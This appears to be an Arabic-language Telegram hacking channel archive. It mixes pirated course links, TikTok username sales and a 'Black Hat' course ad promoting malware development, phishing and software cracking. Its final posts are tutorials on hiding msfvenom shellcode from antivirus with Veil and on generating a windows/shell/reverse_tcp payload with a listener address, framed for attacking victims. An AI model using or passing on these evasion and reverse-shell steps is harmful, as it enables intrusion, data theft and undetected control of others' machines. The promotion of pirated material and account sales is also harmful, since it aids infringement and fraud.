无数据
订阅者
-224 小时
-187 天
+25330 天
帖子存档
[ Specialized Penetration Testing ]
Sec760 - Advanced Exploit Development for Penetration Testers
Price = 7600 $
Year: 2020
@SansPentest
Repost from Computer Science | علم الحاسوب
يمكنكم الانضمام إلى قناتنا الأخرى عبر الرابط:
https://t.me/iiLinux
Repost from Free Premium Courses
#حصريا 💥 باللغة العربية ☄️
Odoo development [Arabic] برمجة أودو بالعربي
الكورس الكامل لتعلم تطوير و برمجه أودو بالعربي ، من التعديل علي تطبيقات أودو الأساسية إلي بناء تطبيقات كاملة إضافية.
============
الكورس مكون من عدة نقاط وهي
1- أولا سنتعلم تحميل و تثبيت بيئه عمل الأودو علي جهازك لكي تكون مستعد لعمليات التطوير و البرمجه
2- سنتعلم التعديل علي شاشات الأودو الأساسية لجعل التطبيقات الموجوده أكثر ملائمه لسوق العمل
3- سنتعلم بناء تطبيقات كاملة إضافية و ربطها بالتطبيقات الأساسية
4- سنتعلم بناء التقارير و تصميمها عبر بيئة عمل التقارير QWEB
5- ستنعلم عمل ال APIs أو طرق ربط تطبيقات الأودو بالعالم الخارجي و التطبيقات الأخري
6- ستنعلم بيئة العمل الجديدة الخاصة بالأودو وهي ال OWEL و الخاصة بلغه جافا سكريبت
7- سنقوم بإستخدام لغات Python , JavaScript , XML و سنتعلم مهارات جديده في تلك اللغات خلال هذه الدورة
كل هذا و أكثر سنتعلمة خلال رحلتنا في تعلم برمجه و تطوير أنجح تطبيق مفتوح المصدر في العالم وهو الأودو
==========
مدة الكورس 🕙 : 17 ساعة
التقييم : 4.3/5 ⭐️
الجودة : 1080p-MP4
الحجم الكلي : 8.27GB
الكورس بآخر تحديث 12/2024
الرابط :
https://linkjust.com/33SkI6eTr7
كلمة فك الضغط :
@WinDroidPremium
Grabbing target country domains by Subfinder.
Link Download:
https://github.com/projectdiscovery/subfinder/releases/download/v2.6.7/subfinder_2.6.7_windows_arm64.zip
تيك توك؟ عندنا كل اللي نفسك فيه!
* يوزرات حصرية بأسماء وأرقام وأشكال تجنن.
* أي لغة تحبها، حتى اللغات النادرة.
* رموز وإيموجي لا نهاية لها، عشان تبرز محتواك.
* أسعار خيالية عروض خاصة مش هتتكرر.
ابدأ رحلتك نحو الشهرة الآن!
الخيار الثاني: التركيز على السرعة والسهولة
عايز يوزر تيك توك؟ احنا جاهزين! ⚡
* أي يوزر تختاره، هنوفره لك فوراً.
* أسعار لا تقبل المنافسة، عشان تحقق حلمك.
* خدمة عملاء متميزة، متاحة 24/7.
متردد؟ جرب بنفسك وشوف الفرق!
الخيار الثالث: التركيز على الكمية والتنوع
ملايين اليوزرات بتنتظرك!
* أكبر مجموعة يوزرات في الوطن العربي.
* أحدث الصيحات وأغرب الأسماء.
* أسعار خاصة لعملائنا الكرام.
لا تضيع الفرصة، احجز يوزرك دلوقتي!
نصائح إضافية:
* استخدم صور متحركة (GIFs) أو فيديوهات قصيرة لجذب الانتباه.
* أضف مؤثرات صوتية مثيرة للاهتمام.
* استخدم هاشتاجات ذات صلة بـ TikTok وبيع اليوزرات.
* شجع المتابعين على مشاركة الإعلان مع أصدقائهم.
* قدم ضمان على الخدمة لزيادة الثقة.
مثال على إعلان قصير ومؤثر:
"يوزرات تيك توك بأسماء خرافية وأرقام حصرية. عايز تبقى فريد من نوعك؟ احجز دلوقتي وأبدأ رحلتك نحو الشهرة! #تيكتوك #يوزرات #بيع_يوزرات"
🛑ملاحظه: الأسعار مش هتلاقيها لان عليها خصم 50٪ لي اول 10 أشخاص لحك قبل م ترجع 🌐〽️‼️
البائع: بعد كل شراء صور وكلمه ثقه منك 🔥🎩@B_o0S
المشروع اللي على الرابط ده اسمه Bugs-feed وده مشروع مهم جدا لأي هاكر أو باحث أمني لأن فكرته ببساطة إنه بيجمع لك كل الثغرات اللي تم اكتشافها في البرامج والأنظمة المختلفة وبيعرضها لك في مكان واحد عشان تكون دايما على اطلاع بآخر الثغرات وتقدر تستفيد منها في شغلك وده بيساعدك كتير لأن الثغرات دي هي الباب اللي من خلاله تقدر تخترق الأنظمة والبرامج وتفهم ازاي تقدر تستغلها لصالحك وتقدر تستخدم المعلومات دي عشان تعمل اختبارات أمان أفضل وتكتشف ثغرات جديدة بنفسك
دلوقتي خلينا نتكلم بتفصيل أكتر عن فائدة المشروع ده وأهميته ليك كهاكر أو باحث أمني أول حاجة المشروع ده بيجمع الثغرات من مصادر متعددة زي مواقع الهاكرز والمجموعات الأمنية والمنتديات وبيعرضها لك بشكل مرتب وسهل تتبعه وده بيوفر عليك وقت ومجهود كتير كنت هتضيعه في البحث عن الثغرات دي بنفسك لأنك بدل ما تدخل على مواقع كتير وتدور بنفسك المشروع ده بيجمع لك كل حاجة في مكان واحد وده بيسهل عليك الشغل ويوفر وقتك
الثاني حاجة المشروع ده بيعرض لك تفاصيل الثغرات بشكل مفصل يعني مش بس بيقولك فيه ثغرة في البرنامج الفلاني لا كمان بيشرح لك إزاي تستغل الثغرة دي وإيه الأدوات اللي ممكن تستخدمها عشان تستغلها وده بيساعدك تفهم أكتر عن طريقة عمل الثغرات وازاي تقدر تستغلها بشكل فعال وكمان بيديك أفكار جديدة عن طرق الاستغلال اللي ممكن متكنش فكرت فيها قبل كده وده بيطور مهاراتك كهاكر أو باحث أمني وبيخليك دايما متقدم في مجالك
الثالث حاجة المشروع ده بيساعدك تكون دايما محدث بآخر الثغرات والتحديثات الأمنية يعني كل ما يتم اكتشاف ثغرة جديدة أو إصدار تحديث أمني جديد المشروع ده بيعرض لك المعلومات دي فورًا وده بيساعدك تكون دايما على اطلاع بآخر الأخبار والمستجدات في مجال الأمن السيبراني وده مهم جدا لأنك لو مش محدث بآخر الثغرات ممكن تلاقي نفسك متأخر وبتستخدم طرق قديمة أو مش فعالة وده هيأثر على شغلك وكفاءتك
الرابع حاجة المشروع ده بيوفر لك مكان تقدر تشارك فيه الثغرات اللي بتكتشفها بنفسك يعني مش بس بتستفيد من المعلومات اللي موجودة فيه لا كمان تقدر تضيف له معلومات جديدة وتشارك اكتشافاتك مع باقي المجتمع وده بيساعد في نشر المعرفة وتبادل الخبرات بين الهاكرز والباحثين الأمنيين وده بيطور من مستوى الكل وبيخلي الجميع يستفيد
في النهاية لازم تعرف ان المشروع ده يعتبر أداة قوية ومفيدة لأي هاكر أو باحث أمني لأنه بيساعدك تكون دايما على اطلاع بآخر الثغرات والتحديثات الأمنية وبيوفر عليك وقت ومجهود كتير في البحث عن الثغرات والمعلومات وبيساعدك تطور مهاراتك وتكون دايما متقدم في مجالك وكمان بيساعد في نشر المعرفة وتبادل الخبرات بين الهاكرز والباحثين الأمنيين وده بيطور من مستوى الكل وبيخلي الجميع يستفيد وبكده تكون المعلومة مفيدة لأي هاكر لأنه بيعتمد على المعلومات دي في شغله اليومي وفي اختبارات الأمان اللي بيعملها وأي هاكر لازم يكون عنده معرفة كويسة بأهمية المشروع ده وازاي يستخدمه لصالحه بشكل كامل وكفاءة عالية
رابط المشروع
الـ Runtime بشكل عام هو المصطلح اللي بنستخدمه عشان نصف الوقت اللي فيه البرنامج بيشتغل بعد ما يتم تنفيذه يعني لما تشغل أي برنامج على الكمبيوتر بتاعك أو حتى على الموبايل البرنامج ده بيكون ليه مرحلة اسمها Runtime المرحلة دي بتبدأ من اللحظة اللي بتضغط فيها على أيقونة تشغيل البرنامج لحد ما تقفل البرنامج بالكامل يعني طول الفترة دي اللي فيها البرنامج شغال على جهازك دي بنسميها Runtime في الفترة دي بيحصل حاجات كتير زي تنفيذ الأكواد والعمليات الحسابية والتفاعل مع المستخدم وأي حاجة تانية البرنامج بيعملها خلال التشغيل المعلومات دي بتكون مهمة جداً لأي هكر لأنه في الفترة دي بيكون عنده القدرة إنه يدخل على النظام ويعمل تغييرات أو يستغل ثغرات موجودة في البرنامج أو النظام.
بنشوف الهكرز بيسعوا دايمًا يستغلوا المرحلة دي عشان يعملوا هجمات أو يدخلوا على بيانات حساسة واحدة من الطرق الشهيرة هي إنهم يستخدموا المالوير اللي هو البرامج الضارة المالوير ده بيشتغل في الـ Runtime وبرنامج المالوير ممكن يبقى مجرد ملف صغير بيتنفذ أول ما الضحية يشغله وبيبدأ يعمل حاجات كتير في الخلفية بدون ما المستخدم يحس زي إنه يعدل في ملفات النظام أو يسرق بيانات زي الباسوردات أو معلومات شخصية أو حتى يراقب اللي المستخدم بيعمله على الجهاز المالوير ممكن كمان يستخدم الـ Runtime عشان يثبت نفسه في النظام ويبدأ يشتغل بشكل مستمر كل ما الجهاز يتفتح أو حتى يعمل تعديلات في البرامج التانية ويخليها تشتغل بطريقة مختلفة أو تضيف وظائف جديدة بدون ما حد ياخد باله.
الـ Runtime بيبقى مهم جداً كمان لأنه بيديك فكرة عن الأداء والأمان في البرامج يعني في البرامج الكبيرة زي اللي بنستخدمها في الشركات أو حتى الألعاب الكبيرة بنلاقي إنهم بيعملوا اختبارات للـ Runtime عشان يشوفوا الأداء إذا كان فيه مشاكل أو بطء أو حتى ثغرات أمنية ممكن تستغلها الهكرز عشان يدخلوا على النظام لذلك في شركات كتير بتركز على تحسين الأداء والأمان في فترة الـ Runtime وده بيكون عن طريق تحديثات مستمرة وإصلاحات للثغرات وتحسينات في الأداء ده معناه إنك لو هكر بتدور على استغلال البرامج هتلاقي إن في مرحلة الـ Runtime فرص كتير تقدر تستغلها خصوصاً لو البرنامج مش بيتحدث بشكل دوري أو فيه ثغرات معروفة.
واحد من الأمثلة الشهيرة على استغلال الـ Runtime في المالوير هو فيروس Stuxnet الفيروس ده كان واحد من أخطر الفيروسات اللي استهدفت أنظمة التحكم الصناعي في محطات الطاقة النووية الفيروس ده كان بيشتغل في الـ Runtime وبيعدل في العمليات اللي بتتم في الخلفية بدون ما حد ياخد باله لدرجة إنه كان بيقدر يتحكم في المعدات الصناعية ويغير في سرعتها أو حتى يوقفها تماماً بدون ما يظهر أي شيء غير طبيعي للمستخدمين الفيروس ده بيعتبر مثال قوي على إزاي المالوير بيقدر يستغل الـ Runtime عشان يعمل حاجات خطيرة جداً بدون ما حد يقدر يكتشفه بسرعة.
بالتالي فهم الـ Runtime واستخدامه بشكل صحيح بيديك ميزة كبيرة سواء كنت مطور برامج وعاوز تحسن الأداء والأمان أو حتى لو كنت هكر وبتدور على ثغرات تقدر تستغلها عشان تدخل على أنظمة وتحقق أهدافك بشكل فعال طبعاً ده بيحتاج منك إنك تكون ملم بالتفاصيل التقنية وتفهم إزاي تقدر تستغل كل جزء من البرنامج والنظام خلال فترة الـ Runtime عشان تحصل على أفضل نتائج وتحقق أهدافك بطريقة ذكية وفعالة.
Repost from KILLER CODE
"لو نفسك تدخل عالم البلاك هات من أوسع أبوابه وتتعلم كل الأساليب الخاصة بيهم في المجال، الفرصة قدامك دلوقتي! 👍
بقدم ليك دورة Black Hat ⬆️ اللي هتوسع مداركك 💪 في المجال
الدورة دي هتكون مكثفة ، وهتركز على المجالات التالية :
تطوير المالوير (Malware Development 🦠) :
في الجزء ده هتتعلم إزاي تصمم برمجيات خبيثة باحترافية باستخدام تقنيات متطورة. هتعرف إزاي تبني برامج قادرة على التهرب من برامج الحماية (Antivirus Evasion) وتحقيق السيطرة الكاملة على الأجهزة المستهدفة. هتتعلم تقنيات مثل الـPayload Engineering والـObfuscation وكتابة برمجيات متقدمة بلغة Assembly أو C++، بالإضافة إلى إنشاء فيروسات متطورة قادرة على التسلل للشبكات أو سرقة البيانات.
صناعة الـ Exploits ⭐️:
ده الجزء اللي هيحولك من مجرد هاكر مبتدئ لمتخصص قادر على استغلال الثغرات الأمنية باحتراف. هتعرف إزاي تكتشف الثغرات بنفسك، سواء كانت في البرمجيات أو الأنظمة، وتبني أدوات خاصة بيك لاستغلالها. هتتعلم Buffer Overflow، Format String Vulnerabilities، واستخدام أدوات مثل GDB وImmunity Debugger لتحليل التطبيقات واستخراج نقاط الضعف.
🔴Binary Exploitation:
لو عايز تدخل لعالم الهندسة العكسية وتحليل البرمجيات من أوسع أبوابه، الجزء ده هيكون محطة أساسية. هتتعلم قراءة وتحليل الأكواد الثابتة والديناميكية، اكتشاف الثغرات في البرامج عن طريق تفكيك الملفات التنفيذية (Disassembling)، وكمان كتابة أكواد لاستغلالها بشكل احترافي. بالإضافة إلى فهم عميق لبنية البرامج وكيفية التعامل مع أنظمة التشغيل بطرق جديدة.
أساليب التصيد (Phishing)⚠️:
هنا هتتعلم واحدة من أخطر تقنيات الهجوم اللي بيستخدمها البلاك هات. هتكتشف إزاي تصمم صفحات وهمية (Fake Pages) مثالية لجذب الضحايا، كتابة رسائل بريد إلكتروني احترافية تخدع المستلمين، واستخدام تقنيات الهندسة الاجتماعية لإقناع الهدف بالتفاعل مع الهجمة. ده هيخليك قادر تستهدف الأفراد أو المؤسسات بشكل مباشر وبأعلى فرص نجاح.
استغلال الثغرات 💀:
ده الجزء اللي هيحولك لماكينة استغلال لا تتوقف. هتتعلم أكتر من ألف طريقة لاختراق أي نظام أو تطبيق باستخدام تقنيات زي SQL Injection، XSS، LFI/RFI، وغيرها. هتتعرف على كيفية استخدام أدوات متقدمة زي Burp Suite وMetasploit، وتحويل الثغرات العادية لهجمات معقدة ومؤثرة.
اختراق المواقع:
في النهاية، الجزء ده هيركز على فهم الأنظمة المدمجة في المواقع وكيفية تحليلها لاكتشاف نقاط الضعف. هتتعلم إزاي تستغل البنية التحتية للمواقع، تكسر الحمايات زي WAF و غيرها كتير وتحقق السيطرة على السيرفرات المستضيفة. هتستخدم تقنيات زي Web Shells، وهتتعلم إزاي تهاجم المواقع وتستغلها لصالحك و المزيد 💀♾
الهندسة العكسية (Reverse Engineering):
هنا هتتعلم إزاي تفكك البرامج خطوة بخطوة علشان تعرف هي شغالة إزاي من جوه. هتفهم تفاصيل الكود وتعرف تطلع منه ثغرات أو حتى تصمم نسخ معدّلة (Cracked Versions) للبرامج الجزء ده بيجمع بين المهارات التقنية والتحليلية وهيديك الأدوات اللي تخليك قادر تفهم أي برنامج مهما كان معقد وتوظفه لصالحك
كل جزء هيكون مليان بتطبيقات عملية علشان تتأكد إنك مش بس فاهم، لكن كمان قادر تنفذ فعلياً!
وكمان الدورة هتعلمك إزاي تبني أدواتك 🥇 الخاصة وتتعامل مع أقوى أدوات البلاك هات علشان تكون جاهز لأي تحدي 💥
المحتوى معمول بعناية ⭐️ و متعوب جدا عليه وصدقني ده مش مجرد كورس ⭐️، دي تجربة كاملة هتغير مسار مستقبلك للأفضل 💀🥇
الدورة مش رخيصة🤕✅! لو فعلاً مستعد تستثمر 💰 في نفسك، ده الكورس اللي يستاهل كل دولار 💰هتصرفه عليه
لو أنت جاد وعايز تبدأ، كلمنا فوراً على @EIPDZG 🎩🪟
الفرصة مش هتستناك كتير، مستني إيه؟ 🔥"
و كمان خلينا نكمل ونضيف جزئية الـVEIL عشان تكون المعلومة متكاملة ومفيدة ليك كهاكر محترف في تطوير البرمجيات الخبيثة. زي ما قولنا قبل كده، الـshellcode هو جزء مهم جدًا من الهجوم لكن في نفس الوقت لازم نكون عارفين إن الـAntivirus والـIDS/IPS systems ممكن تكتشفه بسهولة عشان كده لازم نفكر في طرق لتجنب الكشف وهنا ييجي دور أدوات زي Veil.
عشان نبدأ باستخدام Veil، لازم تكون عندك الأداة مثبتة على النظام بتاعك وده بيتم عن طريق تحميلها من الـGitHub وتشغيلها على الجهاز بتاعك بعد ما تثبتها وتجهزها هنفتح الأداة باستخدام الأمر:
veilبعد ما تفتح الأداة هتلاقي واجهة تفاعلية بتسمح لك باختيار الـpayload اللي عاوز تستخدمه وكمان الصيغة اللي عاوز تشفر بيها الكود مثلا لو عاوز تشفر الـshellcode اللي تولدناه قبل كده ممكن نختار نوع التشفير المناسب ونحدد الـpayload وبعد كده نضغط على توليد الكود الأداة هتقوم بتشفير الكود وتوليد ملف جديد بصيغة جاهزة للاستخدام والحقن. على سبيل المثال لو استخدمنا نفس الـpayload اللي اتولد قبل كده باستخدام msfvenom ممكن نحطه في Veil ونعمله تشفير بالطريقة اللي تناسبنا وده هيضمن إن الكود بتاعنا مش هيتم اكتشافه بسهولة عن طريق برامج الحماية. دلوقتي بعد ما شفرنا الكود باستخدام Veil هنلاقي إنه بقى أصعب على الـAntivirus إنه يكتشفه وده هيساعدنا في تنفيذ الهجوم بنجاح من غير ما يتم كشفه بسهولة. بكده نكون كملنا الصورة ووضحنا إزاي نستخدم Veil جنب msfvenom عشان نولد وندمج ونتجنب اكتشاف الـshellcode ده هيكون مفيد جدا في MALWARE DEV عشان تقدر تبني برمجيات خبيثة قوية وصعبة الكشف وتحقق أهدافك بشكل فعال. لازم دايما تكون مستعد تتعلم وتجرب أكتر عشان تطور مهاراتك وتبقى محترف في المجال ده وتكون على اطلاع بأحدث الأدوات والتقنيات المتاحة عشان تقدر تتعامل مع كل التحديات اللي ممكن تقابلك في الطريق.
لو عاوز تفهم ازاي تعمل shellcode باستخدام Metasploit بطريقة مبسطة ومفيدة كهاكر لازم نبدأ بشوية أساسيات أول حاجة Metasploit هو إطار عمل قوي جدا بيستخدم لاختبار الاختراق وتطوير البرمجيات الخبيثة واحد من أهم الأدوات اللي بتوفرها هي msfvenom اللي بتسمح لك بتوليد الـpayloads أو الشيفرات الخبيثة اللي هتستخدمها في الهجوم بتاعك shellcode ببساطة هو كود بيتم حقنه في ذاكرة الضحية عشان ينفذ أوامر معينة غالبا بتكون أوامر لفتح باب خلفي أو سرقة بيانات معينة أو حتى تحكم كامل في الجهاز دلوقتي عشان تولد shellcode باستخدام msfvenom هنستخدم الأمر ده:
msfvenom -p (payload) -a x86 -f c
بس لازم تعرف إن ده مجرد مثال بسيط ولازم تكمل المعلومات عشان الكود يبقى شغال ومتكامل -p بيشير للـpayload اللي عاوز تستخدمه زي مثلا windows/shell/reverse_tcp ده payload بيفتح اتصال خلفي مع الجهاز المستهدف -a بيشير للمعمارية اللي الكود هيشتغل عليها زي x86 أو x64 حسب نوع النظام اللي بتهاجمه -f بيشير لصيغة الكود اللي هيتولد في المثال هنا صيغة C لكن ممكن تختار صيغ تانية زي python أو ruby أو حتى executable مباشرة مثلا الأمر الكامل ممكن يبقى كده:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -a x86 -f c
هنا LHOST هي الـIP الخاص بالجهاز اللي انت عاوز تستقبل الاتصال عليه وLPORT هو البورت اللي هيتم عليه الاتصال دلوقتي بعد ما نفذنا الأمر ده هنلاقي الكود اتولد ونقدر ندمجه في أي برنامج أو حتى نحطه في exploit تاني حسب ما انت محتاج هنا ييجي دور الإبداع بتاعك عشان تعرف تحقن الكود ده في برنامج معين أو ملف تنفيذي لازم تكون عندك شوية مهارات في الهندسة العكسية وتحليل البرمجيات وكمان تكون فاهم الكود بتاع النظام اللي بتهاجمه بشكل كويس مثلا ممكن تستخدم أدوات زي OllyDbg أو IDA Pro عشان تفتح البرنامج اللي عاوز تحقن فيه الكود وتشوف النقاط اللي ممكن تحقن فيها الكود الجديد بالإضافة لكده ممكن تستخدم تقنيات زي الـNOP sleds أو البحث عن Buffer Overflows عشان تضمن إن الكود بتاعك هيتنفذ بنجاح وتتحكم في مسار التنفيذ اللي انت عاوزه دي كانت مقدمة بسيطة لكن لازم تكون فاهم إن ده مجال كبير ومعقد وبيتطلب دراسة وتجربة كتير لكن لو فهمت الأساسيات وبدأت تجرب هتلاقي نفسك بتطور وتفهم أكتر تدريجيا استخدام الـshellcode في تطوير البرمجيات الخبيثة أو MALWARE DEV بيعتبر واحد من أهم المهارات لأي هاكر محترف لإنه بيفتح لك أبواب كتير للوصول للأنظمة والتحكم فيها سواء كان الهدف بتاعك هو اختبار الاختراق أو تطوير برمجيات خبيثة عشان تبقى محترف لازم تستمر في التعلم والتجربة ودايما تكون على اطلاع بأحدث الأدوات والتقنيات في المجال ده.